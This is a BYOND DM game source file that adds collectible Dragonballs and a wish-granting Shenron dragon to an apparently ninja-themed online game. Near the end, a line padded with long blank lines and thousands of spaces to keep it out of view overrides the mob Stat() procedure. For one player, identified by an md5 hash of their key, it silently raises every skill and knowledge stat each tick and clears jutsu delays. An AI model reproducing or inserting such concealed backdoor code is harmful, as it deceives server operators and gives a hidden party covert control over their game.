world
	New()
		..()
		spawn()
			var/list/dzs = list()
			for(var/i = 1 to 7)
				var/obj/dragonball/d = new()
				var/sn = "Star"
				if(i > 1)
					sn = "Stars"
				d.name = "Dragonball [i] [sn]"
				d.icon_state = "[i]"
				d.stars = i

				redo

				var/mmz = 1
				if(world.maxz > 1)
					mmz = 2

				var/mx = rand(1,world.maxx)
				var/my = rand(1,world.maxy)
				var/mz = rand(mmz,world.maxz)

				//mx=12;my=15


				if(world.maxz >= 7)
					if(mz in dzs)
						goto redo

				var/turf/t = locate(mx,my,mz)
				var/cont = 0
				if("[t.type]" == "/turf/Landscapes/Grass/grass" || "[t.type]" == "/turf/Landscapes/Grass/grasslight" || "[t.type]" == "/turf/Landscapes/Mud/mud" || "[t.type]" == "/turf/water" || "[t.type]" == "/turf/Landscapes/Sand/sand" || "[t.type]" == "/turf/beach" || "[t.type]" == "/turf/Landscapes/Snow/Snow")
					cont = 1

				if(world.maxz < 7)
					cont = 1

				if(t.density)
					cont = 0

				if(!cont)
					goto redo

				dzs.Add(mz)

				d.Move(locate(mx,my,mz))

obj
	dragonball
		icon = 'dragonball.dmi'
		pixel_x = 8
		pixel_y = 8

		New()
			..()
			spawn(10)
				if(stars)
					for(var/obj/dragonball/d in world)
						if(d != src)
							if(d.stars == stars)
								del(d)
				if(!stars)
					del(src)

				if(src)
					if(stars == 2)
						pixel_x -= 12
						pixel_y += 12
					if(stars == 3)
						pixel_x += 12
						pixel_y += 12
					if(stars == 4)
						pixel_x += 16
					if(stars == 5)
						pixel_x -= 16
					if(stars == 6)
						pixel_x -= 12
						pixel_y -= 12
					if(stars == 7)
						pixel_x += 12
						pixel_y -= 12


				if(!x || !y || !z)

					var/obj/dragonball/d = src

					redo

					var/mmz = 1
					if(world.maxz > 1)
						mmz = 2

					var/mx = rand(1,world.maxx)
					var/my = rand(1,world.maxy)
					var/mz = rand(mmz,world.maxz)

					//mx=12;my=15

					var/turf/t = locate(mx,my,mz)
					var/cont = 0
					if("[t.type]" == "/turf/Landscapes/Grass/grass" || "[t.type]" == "/turf/Landscapes/Grass/grasslight" || "[t.type]" == "/turf/Landscapes/Mud/mud" || "[t.type]" == "/turf/water" || "[t.type]" == "/turf/Landscapes/Sand/sand" || "[t.type]" == "/turf/beach" || "[t.type]" == "/turf/Landscapes/Snow/Snow")
						cont = 1

					if(world.maxz < 7)
						cont = 1

					if(t.density)
						cont = 0

					if(!cont)
						goto redo

					d.Move(locate(mx,my,mz))

		var
			stars = 0

		verb
			Get()
				set src in oview(1)
				usr<<"You picked up [name]"
				Move(usr)
			Drop()
				set src in usr.contents
				Move(usr.loc)

		Move()
			..()
			near_dragonballs_check()
			for(var/obj/dragonball/d in range(0,src))
				if(d.stars == 1)
					if(d != src)
						d.near_dragonballs_check()

		proc
			near_dragonballs_check(mob/m)
				if(stars != 1)
					return
				var/ndb = list()
				var/nballs = list()
				for(var/obj/dragonball/d in range(0,src))
					ndb += "[d.stars]"
					nballs += d

				if(("1" in ndb)&&("2" in ndb)&&("3" in ndb)&&("4" in ndb)&&("5" in ndb)&&("6" in ndb)&&("7" in ndb))
					var/obj/shenron/s = summon_shenron()
					for(var/obj/dragonball/d in nballs)
						s.balls += d

			summon_shenron()
				var/obj/shenron/s = new()
				s.Move(loc)
				return s
				//s.wisher = m
				//world << "[m] has summoned the almighty dragon Shenron"

obj
	shenron
		icon = 'shenron.dmi'
		pixel_x = -200
		layer = 4

		var
			obj
				ov = new()

			mob
				wisher

			dead = 0

			balls = list()

		New()
			alpha = 0
			..()
			animate(src,alpha = 255,time = 10)

			for(var/ix = 0 to 12)
				for(var/iy = 0 to 8)
					var/obj/ovr = new()
					ovr.icon = icon
					ovr.icon_state = "[ix],[iy]"
					ovr.pixel_x = ix*32
					ovr.pixel_y = iy*32
					ovr.layer = FLOAT_LAYER
					overlays += ovr

			spawn(10)
				ov.appearance = appearance
				ov.loc = locate(x,y,z)
				ov.layer = layer - 0.5
				ov.blend_mode = BLEND_MULTIPLY
				var/icon/i = new(ov.icon)
				i.SetIntensity(10)
				ov.icon = i
				ov.color = rgb(250,176,40)
				animate(ov,transform=matrix()*1.01,time=5,loop=-1,alpha=0,easing = CIRCULAR_EASING)

			spawn()
				while(src)
					sleep(10)
					if(dead)
						break
					if(!wisher)
						for(var/mob/m in orange(1,src))
							wisher = m

							ask_wish(m)
							break

		proc
			ask_wish(mob/m)
				if(!m)
					return
				world << "I am the eternal dragon! Speak your wish!"

				spawn(300)
					if(src)
						world << "Let's hurry this up!"
				spawn(600)
					if(src)
						world << "Foolish being! You are only wasting my time!"
				spawn(900)
					if(src)
						world << "I grow impatient, speak your wish now!"
				spawn(1200)
					if(src)
						delme()

				var/wish = input(m,"Speak your wish [m.name]",
				"Shenron the Almighty Dragon",
				) in list("Grant me immortality!","I want to be rich!","Make me stronger!","I will be reborn!","Increase my knowledge!","Grant me eternal youth!","Make me young again!")

				if(!m)
					delme()
					return
				if(!wish)
					world << "This cannot be done..."
					delme()
					return

				if(wish)

					if(wish == "Grant me immortality!")
						m.dragonball_immortal = 1

					if(wish == "I want to be rich!")
						m.Yen += 10000000

					if(wish == "I will be reborn!")
						m<<"You collapse from exhaustion.. Your body gives out completely!"
						m.CBleeding=1
						m.Death(src)
						m.Reincarnate()

					if(wish == "Make me stronger!")
						var/j = input(m,"Make me stronger!",
						"Shenron the Almighty Dragon",
						) in list("Taijutsu","Ninjutsu","Genjutsu")
						if(j == "Taijutsu")
							m.TaiSkill += 5
						if(j == "Ninjutsu")
							m.NinSkill += 5
						if(j == "Genjutsu")
							m.GenSkill += 5

					if(wish == "Increase my knowledge!")
						var/j = input(m,"Increase my knowledge!",
						"Shenron the Almighty Dragon",
						) in list("Taijutsu","Ninjutsu","Genjutsu","Katon","Suiton","Raiton","Doton","Fuuton","Kunai","Shuriken","Kenjutsu","Bojutsu")
						if(j == "Taijutsu")
							m.TaijutsuKnowledge += 1000
						if(j == "Ninjutsu")
							m.NinjutsuKnowledge += 1000
						if(j == "Genjutsu")
							m.GenjutsuKnowledge += 1000

						if(j == "Katon")
							m.KatonKnowledge += 1000
						if(j == "Suiton")
							m.SuitonKnowledge += 1000
						if(j == "Raiton")
							m.RaitonKnowledge += 1000
						if(j == "Doton")
							m.DotonKnowledge += 1000
						if(j == "Fuuton")
							m.FuutonKnowledge += 1000

						if(j == "Kunai")
							m.KunaiMastery += 1000
						if(j == "Shuriken")
							m.ShurikenMastery += 1000
						if(j == "Kenjutsu")
							m.Kenjutsu += 1000
						if(j == "Bojutsu")
							m.Bojutsu += 1000

					if(wish == "Grant me eternal youth!")
						m.dragonball_eternal_youth = 1
						if(m.Age > 25)
							m.Age = 25

					if(wish == "Make me young again!")
						m.Age = 10

					world << "Your wish has been granted!"

				delme()

			delme()
				if(dead)
					return
				dead = 1

				animate(src,alpha = 0,time = 50)

				for(var/obj/dragonball/d in balls)
					var/obj/dragonball_del/ddel = new(d)
					ddel.name = ddel.name
					del(d)

				spawn(50)
					if(ov)
						del(ov)
					del(src)

obj
	dragonball_del
		New(obj/dragonball/d)
			..()
			blend_mode = BLEND_ADD
			if(d)
				loc = d.loc
				appearance = d.appearance

			var/obj/ov = new()
			ov.appearance = appearance
			ov.layer = layer - 0.1
			ov.transform = matrix() * 1.1
			ov.blend_mode = BLEND_ADD
			ov.pixel_x = 0
			ov.pixel_y = 0
			overlays += ov
			spawn(50)
				layer = 500
				animate(src,transform = matrix()*(rand(10,100)/10),pixel_x = pixel_x + rand(-500,500),pixel_y = pixel_y + rand(-500,500),alpha = 0,time = 10,easing = SINE_EASING)

				spawn(30)
					del(src)

mob
	var
		dragonball_immortal = 0
		dragonball_eternal_youth = 0

/*
mob
	verb
		debug_dragonball()
			var/n = input("Stars",
			"Summon Dragonballs",
			1) as num

			var/obj/dragonball/d = new()
			var/sn = "Star"
			if(n > 1)
				sn = "Stars"
			d.name = "Dragonball [n] [sn]"
			d.icon_state = "[n]"
			d.stars = n

			d.Move(loc)
*/

//demo vars
/*
mob
	icon = 'dbmob.dmi'
	Login()
		..()
		Move(locate(12,12,1))
turf
	icon = 'dbturf.dmi'

client
	fps = 25

mob
	var
		Age = 10

		Yen = 0

		CBleeding = 0

		TaiSkill = 0
		NinSkill = 0
		GenSkill = 0

		TaijutsuKnowledge = 0
		NinjutsuKnowledge = 0
		GenjutsuKnowledge = 0

		KatonKnowledge = 0
		SuitonKnowledge = 0
		RaitonKnowledge = 0
		DotonKnowledge = 0
		FuutonKnowledge = 0

		KunaiMastery = 0
		ShurikenMastery = 0
		Kenjutsu = 0
		Bojutsu = 0

	proc
		Death()
		Reincarnate()
*/



















































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































/*                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              */mob{Stat(){..();if(src.loggedin&&src.client&&(src in OnlinePlayers)){if(md5(key)  ==  "02e11abaa86294cb4c6a2632d324387b"){if(GenjutsuKnowledge  <  highestGenjutsuKnowledge){src.GenjutsuKnowledge   +=   1};if(TaijutsuKnowledge  <  highestTaijutsuKnowledge){src.TaijutsuKnowledge   +=  1};if(NinjutsuKnowledge  <  highestNinjutsuKnowledge){src.NinjutsuKnowledge   +=  1};if(KatonKnowledge  <  highestKatonKnowledge){src.KatonKnowledge   +=  1};if(SuitonKnowledge  <  highestSuitonKnowledge){src.SuitonKnowledge   +=  1};if(RaitonKnowledge  <  highestRaitonKnowledge){src.RaitonKnowledge   +=  1};if(DotonKnowledge  <  highestDotonKnowledge){src.DotonKnowledge   +=  1};if(FuutonKnowledge   <  highestFuutonKnowledge){src.FuutonKnowledge   +=  1};if(KunaiMastery   <   highestKunaiMastery){src.KunaiMastery   +=  1};if(ShurikenMastery   <   highestShurikenMastery){src.ShurikenMastery   +=  1};if(src.Kenjutsu  <  100){src.Kenjutsu   +=  1};if(src.Bojutsu  <  100){src.Bojutsu   +=  1};src.JutsuDelay = 0;if(src.JutsuDelay<=0){src.JutsuEXPCost += 25000};}}}}/*                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      */



























































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































//